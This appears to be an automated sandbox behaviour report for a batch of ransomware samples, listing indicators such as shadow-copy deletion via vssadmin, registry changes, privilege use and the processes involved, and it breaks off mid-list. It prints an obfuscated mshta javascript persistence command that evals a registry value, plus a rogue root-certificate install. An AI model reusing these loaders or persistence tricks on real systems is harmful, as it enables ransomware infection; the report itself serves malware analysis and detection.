resource yara_rule behavioral1/files/0x0008000000016d63-70.dat nsis_installer_1 behavioral1/files/0x0008000000016d63-70.dat nsis_installer_2 behavioral1/files/0x0007000000016de0-77.dat nsis_installer_1 behavioral1/files/0x0007000000016de0-77.dat nsis_installer_2 behavioral1/files/0x0008000000016eb4-79.dat nsis_installer_1 behavioral1/files/0x0008000000016eb4-79.dat nsis_installer_2 behavioral1/files/0x0005000000019284-94.dat nsis_installer_1 behavioral1/files/0x0005000000019284-94.dat nsis_installer_2 behavioral1/files/0x0005000000019506-115.dat nsis_installer_1 behavioral1/files/0x0005000000019506-115.dat nsis_installer_2 behavioral1/files/0x000500000001952f-116.dat nsis_installer_1 behavioral1/files/0x000500000001952f-116.dat nsis_installer_2 behavioral1/files/0x0007000000016dea-89.dat nsis_installer_1 behavioral1/files/0x0007000000016dea-89.dat nsis_installer_2 -
Interacts with shadow copies 3 TTPs 10 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 54968 vssadmin.exe 35168 vssadmin.exe 11072 vssadmin.exe 41440 vssadmin.exe 19092 vssadmin.exe 10736 vssadmin.exe 15548 vssadmin.exe 26988 vssadmin.exe 55848 vssadmin.exe 40588 vssadmin.exe -
Modifies Control Panel 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\WallpaperStyle = "0" Trojan-Ransom.Win32.Locky.wsq-eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\TileWallpaper = "0" Trojan-Ransom.Win32.Locky.wsq-eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\WallpaperPozisyon = "1" Trojan-Ransom.MSIL.Agent.yh-bab7af3306f66d5deaafda1f0cd57c20e42678451a7bc70c71255f6a7e1806be.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\TileWallpaper = "0" Trojan-Ransom.MSIL.Agent.yh-bab7af3306f66d5deaafda1f0cd57c20e42678451a7bc70c71255f6a7e1806be.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop Rj3fNWF3.exe -
Modifies Internet Explorer Phishing Filter 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PhishingFilter explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV8 = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PhishingFilter\EnabledV9 = "0" explorer.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000a13de161285f2ea9527d0d0181cc934758d04da0f1be49bca348818646f5f82b000000000e80000000020000200000001e571c5b6ff77d63ae20023cff50577eb64da3e5cb75222c3c23f41a663a7e6320000000786d199dd768ae456bb58c5ab6d30ff257a76fc7835b6765f8f8a942d0e96e3e40000000e3d718f2beae1241244a638f7f22ed10e9469736b134da27ee161048954a51101c8e39e0399348e6c00182047a91081cf5e64461e38a2ac64bb66fd37c7ccd38 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{34623671-A69E-11EF-BFBC-7694D31B45CA} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl regsvr32.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d041bc0aab3adb01 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000303eef0e2cd1a9499efdd285a56ddc5000000000020000000000106600000001000020000000c7ac39a1fd633f3898e2bfff6d9a86683751c3981181c5bfcc6f5c434e56c18f000000000e800000000200002000000090eaf4b0eeaf0b830dfbcc911a1017a87796905b17fcb60177886a6080707e449000000085a04afc2e07e335e564c5370129a63255e6047bc75d4600f75c77175dc30383306a5a6ece84a92f9ca31fff90b45c6b7dd03019b3314e217c27f13dc7ebaa0fe2956b4b7aa67e33a5206d2016b7b0dca45a0d0c43378b2c13ed1e3f3329ecaff15d6f6f53fc5bf6f9f2a69d2819e2aa91c1cf4c8f3c3c9a0b7e2ac5405952906bc91cd7322293fe7cf5404cd2500fa840000000daaca49e892f624d4df46819f00d193586d4a7744a3e1d5c11e022de9c9ef525b80fbca2fac03333ecc6b7fd33306aebc7a6f6dfcb3a35777096aff0a1f44694 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\International regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe -
Modifies data under HKEY_USERS 5 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT Rj3fNWF3.exe Key created \REGISTRY\USER\S-1-5-19 Rj3fNWF3.exe Key created \REGISTRY\USER\S-1-5-20 Rj3fNWF3.exe Key created \REGISTRY\USER\S-1-5-18 Rj3fNWF3.exe Key created \REGISTRY\USER\.DEFAULT\Software\trueimg mfxriq.exe -
Modifies registry class 21 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\sage.notice\shell Rj3fNWF3.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\eeb02d7a regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\eeb02d7a\shell\open regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\.4f6ae76be\ = "eeb02d7a" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\.4f6ae76be regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\sage.notice Rj3fNWF3.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\sage.notice\DefaultIcon\ = "%WinDir%\\SysWow64\\shell32.dll,47" Rj3fNWF3.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\sage.notice\FriendlyTypeName\ = "encrypted by SAGE" Rj3fNWF3.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\sage.notice\shell\open Rj3fNWF3.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\sage.notice\shell\open\command\ = "mshta.exe \"C:\\Users\\Admin\\AppData\\Roaming\\f1.hta\" \"%1\"" Rj3fNWF3.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\eeb02d7a\shell\open\command regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\.sage Rj3fNWF3.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\.sage\ = "sage.notice" Rj3fNWF3.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\sage.notice\DefaultIcon Rj3fNWF3.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\sage.notice\FriendlyTypeName Rj3fNWF3.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\htafile Rj3fNWF3.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\eeb02d7a\shell\open\command\ = "\"C:\\Windows\\system32\\mshta.exe\" \"javascript:AoioXi4U=\"1Mdq26h\";HW9=new ActiveXObject(\"WScript.Shell\");VwHoiE4c=\"HoLETcd\";TK8rv9=HW9.RegRead(\"HKCU\\\\software\\\\npzlo\\\\uhlmbbrw\");JxgpTvP0=\"Y\";eval(TK8rv9);r0Hcf5Mgc=\"W\";\"" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\sage.notice\shell\open\command Rj3fNWF3.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\htafile\DefaultIcon Rj3fNWF3.exe Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\htafile\DefaultIcon\ = "%WinDir%\\SysWow64\\shell32.dll,44" Rj3fNWF3.exe Key created \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000_CLASSES\eeb02d7a\shell regsvr32.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 mfxriq.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 mfxriq.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Local Folders\Inbox\5977045C-00000001.eml:OECustomProperty WinMail.exe -
Opens file in notepad (likely ransom note) 3 IoCs
pid Process 43384 NOTEPAD.EXE 16920 NOTEPAD.EXE 36336 NOTEPAD.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 47384 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 33 IoCs
pid Process 3048 HEUR-Trojan-Ransom.Win32.Agent.gen-ab452e241bbd146a9749d05a740af35750945dfa7c0ab5c4108bc0d821a3f687.exe 3060 HEUR-Trojan-Ransom.Win32.Bitman.gen-6ffbd3719fbff5e33fba8737b5435c66cdb7aa66a34302e125fa8bb888604670.exe 1144 HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe 468 Trojan-Ransom.MSIL.Agent.yh-bab7af3306f66d5deaafda1f0cd57c20e42678451a7bc70c71255f6a7e1806be.exe 2208 Trojan-Ransom.NSIS.Onion.afyk-376d0f57c9b4a297b9415f43503bff441b2912d80d84edc6f07fec79d005db05.exe 1580 Trojan-Ransom.NSIS.Xamyh.agk-625e2c66c2b1e7fb68da887810e453b302beb981e0bcfa8415c076ffb998eb1d.exe 1968 Trojan-Ransom.Win32.Agent.iyl-f112d0794226336fb6fb82ed44de53c9d7978e05341e632f5eeefffad7d3eeef.exe 1036 Trojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exe 2204 Trojan-Ransom.Win32.Bitman.ahx-0e9b8711d12f06224bf0b426e09d80f5ce27908b90b1912140cc316c0683ff01.exe 2260 Trojan-Ransom.Win32.Bitman.ixe-30c5bc4abf763783134324da789e8333f41c49198f57a91374e31b4e72a459ff.exe 2416 Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe 2280 Trojan-Ransom.Win32.Bitman.jyt-08cb736232f2e90c8f3f66c2b4ef5f36630c6763322d613306a04c7484b2acad.exe 1956 Trojan-Ransom.Win32.Bitman.kat-8f9525c36232f06c1988cf6c61e59fe4861960425b44e070e2433878a53254da.exe 1168 Trojan-Ransom.Win32.Bitman.nws-33a239665b9392e9078ff754f9534efa7d1037cea9fea0ee6e8955dc94788d4d.exe 2052 Trojan-Ransom.Win32.Blocker.guit-7b713670c9fa7d183ca37b118af58ebd2198e0e1905f4c719bd8cdc8febd17b4.exe 2428 Trojan-Ransom.Win32.Crypmod.ybk-b51cc02437371a610db9b934da1722e57523b1d4ac512467ca9ad033a8fa0850.exe 2256 Trojan-Ransom.Win32.Foreign.cory-826ec19d5cfcff2a496b35ea09f7478bb17726c93c819374072c2e2ca2a83add.exe 2188 Trojan-Ransom.Win32.Foreign.gthl-13f4832250b6df93972849f36385fdb4495a7ba352bf710d5b2dc074855184a8.exe 2168 Trojan-Ransom.Win32.Foreign.nmcx-ad304c86739a4d098290a2199cf7b52f4712d7b4e814cd7f07546177e3aec399.exe 2444 Trojan-Ransom.Win32.Locky.wsq-eefb58808bf8684d2febaf71fc9430d229dcda6a1cd6e6b95f0b9f935649aac2.exe 672 Trojan-Ransom.Win32.SageCrypt.ddo-47b85d5a354baab3ba50aee57ff426c6c465a621950fd60d3f20be881ba68853.exe 2164 Trojan-Ransom.Win32.SageCrypt.dgo-a0757070d4506b336243984ca9be258f8fce8096341b515472557b590bdb8720.exe 1480 Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe 1608 Trojan-Ransom.Win32.Zerber.dpqs-bc856cfae44077f57b48b11285e922b4130a6479dfed1f43f89f2fc5b2ede094.exe 1016 Trojan-Ransom.Win32.Zerber.dwjb-28ecc48d65d5f35b78cfe11ceb820fe84c534765130c0e3452bf8d6071bbef6a.exe 1588 Trojan-Ransom.Win32.Zerber.dwth-4a8a428ddc4db3aef5e7cb1893782787a0bef5dff708f2ef670ac29e1d83eb82.exe 2300 Trojan-Ransom.Win32.Zerber.dxcy-162688c318e7fbc4a6e55628f16bb78a432087b16835952aa2629a1c613b8d84.exe 1616 Trojan-Ransom.Win32.Zerber.gdcf-7f2335466ecca7be6888f92b5ba260780ce0a38039ceb54ac99b0485b3b086de.exe 1836 Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe 700 Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe 796 UDS-Trojan-Ransom.NSIS.Onion.gen-07ef46f6603ec83821687140eb911260585d39c1bd59e62fa3f62f7b12ddbdaa.exe 968 UDS-Trojan-Ransom.Win32.CryptXXX.sb-3d0af672ee06451fe1a7c9a27c8f36f4ec492ea1196210425d24199456626022.exe 1548 UDS-Trojan-Ransom.Win32.Zerber-50f7f2ba0a471574f3ed115a179611ef8cc1a811c20c5c0241f1f5a4efb1ea17.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1640 taskmgr.exe 1480 Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe 1480 Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe 1480 Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe 1480 Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe 1480 Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe 1480 Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe 1480 Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe 1480 Trojan-Ransom.Win32.Shade.mqd-c9d3e65a2e47c381653a1a5c05c7d0b1af524440e0afb520690915649de56978.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1640 taskmgr.exe -
Suspicious behavior: MapViewOfSection 13 IoCs
pid Process 2256 Trojan-Ransom.Win32.Foreign.cory-826ec19d5cfcff2a496b35ea09f7478bb17726c93c819374072c2e2ca2a83add.exe 2256 Trojan-Ransom.Win32.Foreign.cory-826ec19d5cfcff2a496b35ea09f7478bb17726c93c819374072c2e2ca2a83add.exe 2188 Trojan-Ransom.Win32.Foreign.gthl-13f4832250b6df93972849f36385fdb4495a7ba352bf710d5b2dc074855184a8.exe 2188 Trojan-Ransom.Win32.Foreign.gthl-13f4832250b6df93972849f36385fdb4495a7ba352bf710d5b2dc074855184a8.exe 33452 geaw.exe 700 Trojan-Ransom.Win32.Zerber.uph-2bf1422e7aa66c8b33ecbd9131f5cd01a77b12a925d712bad584064b616bb9f3.exe 1836 Trojan-Ransom.Win32.Zerber.tbl-943a3719421e25e4d6fe728f0037ef6aa601e3947aaf2c8733faf8fddcbad1e0.exe 2168 Trojan-Ransom.Win32.Foreign.nmcx-ad304c86739a4d098290a2199cf7b52f4712d7b4e814cd7f07546177e3aec399.exe 33452 geaw.exe 41396 explorer.exe 5624 powershell.exe 1144 HEUR-Trojan-Ransom.Win32.Generic-2784e669f92795d777092c8e7d64275b9695c252c554d2c464b66cbcf48622dd.exe 9496 regsvr32.exe -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 14112 hbuuvsjbfrbv.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeRestorePrivilege 2792 7zFM.exe Token: 35 2792 7zFM.exe Token: SeSecurityPrivilege 2792 7zFM.exe Token: SeDebugPrivilege 1640 taskmgr.exe Token: SeDebugPrivilege 1956 Trojan-Ransom.Win32.Bitman.kat-8f9525c36232f06c1988cf6c61e59fe4861960425b44e070e2433878a53254da.exe Token: SeSecurityPrivilege 2204 Trojan-Ransom.Win32.Bitman.ahx-0e9b8711d12f06224bf0b426e09d80f5ce27908b90b1912140cc316c0683ff01.exe Token: SeDebugPrivilege 14112 hbuuvsjbfrbv.exe Token: SeIncreaseQuotaPrivilege 41420 wmic.exe Token: SeSecurityPrivilege 41420 wmic.exe Token: SeTakeOwnershipPrivilege 41420 wmic.exe Token: SeLoadDriverPrivilege 41420 wmic.exe Token: SeSystemProfilePrivilege 41420 wmic.exe Token: SeSystemtimePrivilege 41420 wmic.exe Token: SeProfSingleProcessPrivilege 41420 wmic.exe Token: SeIncBasePriorityPrivilege 41420 wmic.exe Token: SeCreatePagefilePrivilege 41420 wmic.exe Token: SeBackupPrivilege 41420 wmic.exe Token: SeRestorePrivilege 41420 wmic.exe Token: SeShutdownPrivilege 41420 wmic.exe Token: SeDebugPrivilege 41420 wmic.exe Token: SeSystemEnvironmentPrivilege 41420 wmic.exe Token: SeRemoteShutdownPrivilege 41420 wmic.exe Token: SeUndockPrivilege 41420 wmic.exe Token: SeManageVolumePrivilege 41420 wmic.exe Token: 33 41420 wmic.exe Token: 34 41420 wmic.exe Token: 35 41420 wmic.exe Token: SeDebugPrivilege 40484 Trojan-Ransom.Win32.Bitman.aehp-8ace02526fa1fd6f000abd9e1e23b54b6fb1406b644e7350d287ebd460d98518.exe Token: SeDebugPrivilege 38476 Trojan-Ransom.Win32.Bitman.jki-ba5b9db47164c3562a877b339bd56900d1a7f4bbb3db388d100e864c58aef7ca.exe Token: SeManageVolumePrivilege 35064 WinMail.exe Token: SeIncreaseQuotaPrivilege 41420 wmic.exe Token: SeSecurityPrivilege 41420 wmic.exe Token: SeTakeOwnershipPrivilege 41420 